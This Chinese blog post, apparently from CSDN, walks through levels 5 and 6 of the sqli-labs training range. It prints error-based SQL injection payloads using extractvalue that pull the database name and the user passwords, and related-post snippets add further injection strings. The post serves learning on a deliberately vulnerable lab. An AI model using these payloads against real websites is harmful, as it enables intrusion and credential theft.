sqli-labs 5-6

已于 2022-07-09 15:19:43 修改
阅读量185 收藏
点赞数
文章标签: sql
于 2022-07-08 11:27:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69548793/article/details/125674399
版权

        从第五关开始,数据库的一些信息就没有再直接地显示在网页中了,因此我们需要选择一些其他的方法来让我们得到想要的信息。

在文本编辑器中我们可以提前知道less-5中使用的sql语句:

        $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

 这样我们可以提起知道待会需要输入的数据格式。

如上,当?id=1'--+时网页没有报错。

当我们像处理前四题一样构建数据时,网页上并没有出现我们想要的结果。 

所以,我们需要通过让它报错来得到我们想要得到的信息。

接下来我们将使用到下面两个函数:

extractvalue(xml文档字符串,xpath格式字符串)                对XML文档进行查询的函数
updatexml(xml文档字符串,xpath格式字符串,替换字符串)            对XML文档进行查询并更新的函数

GET /sqli2/sqli2/Less-5/?id=1000' union select 1,2,extractvalue(1,concat('%',database()))--+

笔者这使用的是 extractvalue 函数,网页成功报错同时显示了数据库的名字。

GET /sqli2/sqli2/Less-5/?id=1000' union select 1,2,extractvalue(1,concat('%',(select group_concat(username) from users)))--+ HTTP/1.1 

GET /sqli2/sqli2/Less-5/?id=1000' union select 1,2,extractvalue(1,concat('%',(select group_concat(password) from users)))--+ HTTP/1.1

通过这个方法我们也能让它显示出用户名和密码,但是这个方法会限制它显示的内容,只能显示出31个字符。

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"

这是第六题的sql语句,与前面的题大同小异,简单更改一下输入的内容就能得到上面的结果。 

空门青
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Sqlilabs-6
KAKA的博客
07-06 854
第 6 关跟第 5 关一样,只不过是单引号换成了双引号而已 构造 ID 后,显示的内容为:You are in… http://sqlilabs/Less-6/?id=1 回显正常 http://sqlilabs/Less-6/?id=1' 回显正常 http://sqlilabs/Less-6/?id=1" 回显正常 http://sqlilabs/Less-6/?id=1"--+ 回显正常 因为正常时返回的内容为 You are in…无法从返回结果
sqli-labs1-6学习
qq_38989921的博客
11-26 179
sqli-labs1-6学习 SQLI,sql injection,我们称之为sql注入。何为sql,英文:Structured Query Language,叫做结构化查询语言。常见的结构化数据库有MySQL,MS SQL ,Oracle以及Postgresql。Sql语言就是我们在管理数据库时用到的一种。在我们的应用系统使用sql语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的是,在拼接sql语句的时候,我们可以改变sql语句。从而让数据执行我们想要执行的语句,这就是我们常
Sqli-labs less 6
lixiangminghate的专栏
06-23 549
转自:lcarmyLess6与less5的区别在于less6在id参数传到服务器时,对id参数进行了处理。这里可以从源代码中可以看到。id=′"′.id=′"′.id.'"';sql="SELECT∗FROMusersWHEREid=sql="SELECT∗FROMusersWHEREid=id LIMIT 0,1";那我们在这一关的策略和less5的是一样的。只需要将 ' 替换成 " .这里我们...
sqli-labs————less6
Fly_鹏程万里
05-09 554
Less 6源码:主要代码:$id = '"'.$id.'"'; $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; $result=mysql_query($sql);从以上代码中可以中看看,这里我们可以将“‘  ”替换为“ "  ”,之后的语句正常构造就好:这里简单演示一个猜解数据库版本信息的:猜解数据库的第一个字符:之后的内容与之前在less...
sqli注入--利用information_schema配合双查询报错注入
weixin_30779691的博客
01-18 300
目录 sqli-labs 5、6双查询报错注入通关 0x01 获取目标库名 0x02 获取库中表的数量 0x03 获取库中表名 0x04 获取目标表中的列数 0x05 获取目标表的列名 0x06 从列中获取用户名 0x07 获取对应的...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
sqli-labs.rar
12-22
SQL注入练习平台搭建,需要PHPstudy等对应的工具配合使用,很适合小白练习,收悉SQL的注入由浅入深 东西是好东西网上也有,后期会出教程。
sqli-labs 5~6 多命通关攻略
两个月亮
01-06 743
在 right() 函数无法精确对回显区域的显示内容进行精确的偏移后,我尝试了 substr()、mid()、substring() 等截取函数,发现都无法做到精确偏移的效果。退而求其次,我们可以将偏移量减小为回显区域可显示的最大字符长度的一半。在这个例子中,我们可以将 right() 函数的第二个参数由原来的 32 减小为 16。观察上面多次的偏移结果,我们可以发现我们为 right() 函数设置的第二个参数并不总是如我们所愿的原因是符号问题right() 函数的第二个参数为32时的返回结果。
Sqli-labs6-10 盲注、基于时间,基于报错(附脚本)
Recar的博客
12-13 2660
第六题 双引号双注入和第五题一样的界面单引号,不报错,使用双引号 报错http://localhost/sqli-labs/Less-6/?id=-1"; union select 1 from(select count(*),concat_ws(':',(select version()),floor(rand(0)*2))a from information_schema.tables gro
sqli-labs-基于报错的注入
zlloveyouforever的博客
04-30 2777
这里使用sqli-labs第六关来学习报错注入,当然第五关也是可以使用的。会简单介绍updatexml(),extractvalue(),floor(),exp(),geometrycollection(),multipoint()六个函数的使用。
sqli libs 6-10
鲨鱼辣椒的博客
05-28 117
第六关 手工注入 找到注入点 ?id=1 正常 ?id=1' 正常 ?id=1" 错误 确定字段数量 ?id=1" order by 3--+ 正常 ?id=1" order by 4--+ 错误 说明有3个字段,而且通过页面回显我们可以看出是和第五关是一样的,所以第五关和第六关的区别就是第五关是单引号,第六关是双引号 猜解数据库名 确定数据库长度 ?id=1" and length(database()) = 8 --
sqlilabs—less6
一个普普通通的博客
03-16 1437
sqlilabs—less6
SQLAlchemy 连接池
youhebuke225的博客
06-17 208
调整这些参数可以帮助你更好地管理数据库连接,并减少因连接超时或服务器断开连接而导致的问题。记得根据你的应用程序的需求和数据库服务器的配置来合理设置这些参数。在 SQLAlchemy 中,确实可以通过配置连接池的参数来管理连接的超时和回收,从而确保连接在需要时能够被重新建立。SQLAlchemy 使用的是。作为其默认的连接池实现。为了配置这些参数,你可以在创建引擎时将它们传递给。
PostgreSQL源码分析——绑定变量
最新发布
让我思考一下
06-18 164
这里分析一下函数中应用绑定变量的问题,但实际应用场景中,不推荐这么使用。
PostgreSQL源码分析——CREATE TYPE
让我思考一下
06-18 305
定义一个复合类型某种程度上就是定义一张新的表,表的rowtype就是复合类型。会看到创建一个复合类型的同时会创建一个同名的表。这个表可以在pg_class系统表中查到,但是通过\d等却查不到,也不能想表中插入数据,因为它并不是真正意义上的表,只是用表实现复合类型。这部分因为不是可优化语句,没有什么处理。这部分因为是Utility语句,没有什么处理的。创建复合类型,我们分析一下其源码实现。
SQL中distinct去重关键字的使用和count统计组合的使用
睡不醒的每天
06-13 516
distinct必须在列的前面,否则直接提示错误,当distinct作用于单列的的情况下,统计查询的结果为行数目的总数,包含null为空的数目。count(distinct 列名):根据指定的列统计记录总数,不包含重复的记录,不包括NULL或空的值。select distinct 列名1,列名2,列名3…select distinct 列名 from 表;也可以使用count(2)、count(3)等等。count(distinct 列名)
sqli-labs通关1-5
09-03
sqli-labs通关5关:通关5关的方法没有在提供的引用中找到相关信息。 请注意,为了安全起见,在进行实际操作时,请确保仅在合法和授权的环境中进行,并遵守法律和道德规范。<span class="em">1</span><span class=...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值